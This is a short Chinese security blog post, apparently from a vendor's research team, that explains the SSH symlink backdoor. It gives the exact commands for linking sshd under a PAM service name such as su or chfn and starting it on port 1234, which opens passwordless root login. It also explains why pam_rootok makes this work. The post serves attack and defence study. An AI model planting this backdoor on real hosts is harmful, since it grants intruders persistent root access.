SSH软链接后门利用和原理

本文由锦行科技的安全研究团队提供,主要介绍SSH软连接后门的利用和相关原理。
ssh配置中开启了PAM进行身份验证
查看是否使用PAM进行身份验证:cat/etc/ssh/sshd_config|grep UsePAM
建立软连接后门:ln-sf/usr/sbin/sshd/tmp/su;/tmp/su-oPort=1234
注意:软链接的路径不是绝对的,但名字不是随便命名的,使用命令find/etc/pam.d|xargs grep "pam_rootok",出现的则可以用作软链接名称
# find /etc/pam.d |xargs grep "pam_rootok" 123 ?
grep: /etc/pam.d: 是一个目录
/etc/pam.d/su:auth sufficient pam_rootok.so
/etc/pam.d/su:# permitted earlier by e.g. "sufficient pam_rootok.so").
/etc/pam.d/runuser:auth sufficient pam_rootok.so
/etc/pam.d/chsh:auth sufficient pam_rootok.so
/etc/pam.d/chfn:auth sufficient pam_rootok.so
使用root执行命令
# ln -sf /usr/sbin/sshd /tmp/chfn;/tmp/chfn -oPort=1234
然后使用ssh任意密码连接1234端口登录root账户pam_rootok.so模块
pam_rootok.so主要作用是使得uid为0的用户,即root用户可以直接通过认证而不需要输入密码。
我们查看/etc/pam.d/su 文件中,我们可以看到使用了该模块,这也是为什么root用户切换至普通用户不需要密码的原因。

1.PAM认证机制,若sshd服务中开启了PAM认证机制(默认开启),当程序执行时,PAM模块则会搜寻PAM相关设定文件,设定文件一般是在/etc/pam.d/。若关闭则会验证密码,无法建立软链接后门。
2.当我们通过特定的端口连接ssh后,应用在启动过程中就会去找到配置文件,如:我们的软链接文件为/tmp/su,那么应用就会找/etc/pam.d/su作为配置文件,那么则实现了无密登录。


关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注网络尖刀微信公众号随时掌握互联网精彩
- 1 习近平听取岑浩辉述职报告 7904348
- 2 哈尔滨大雪人原来是挖出来的 7808768
- 3 央视曝光走私孕妇血样黑色产业链 7711816
- 4 2025年度文化记忆 重温感动瞬间 7616367
- 5 女子毛衣粘走3000元翡翠耳环主动归还 7520498
- 6 中央财办:扩大内需是明年首位任务 7426870
- 7 英伟达急着卖芯片 中国不急着买了 7333282
- 8 学校通报“宿管摔死学生小猫” 7236396
- 9 52岁民警处置高速事故被撞身亡 7137509
- 10 用漫画方式了解海南自贸港封关 7040734




锦行科技
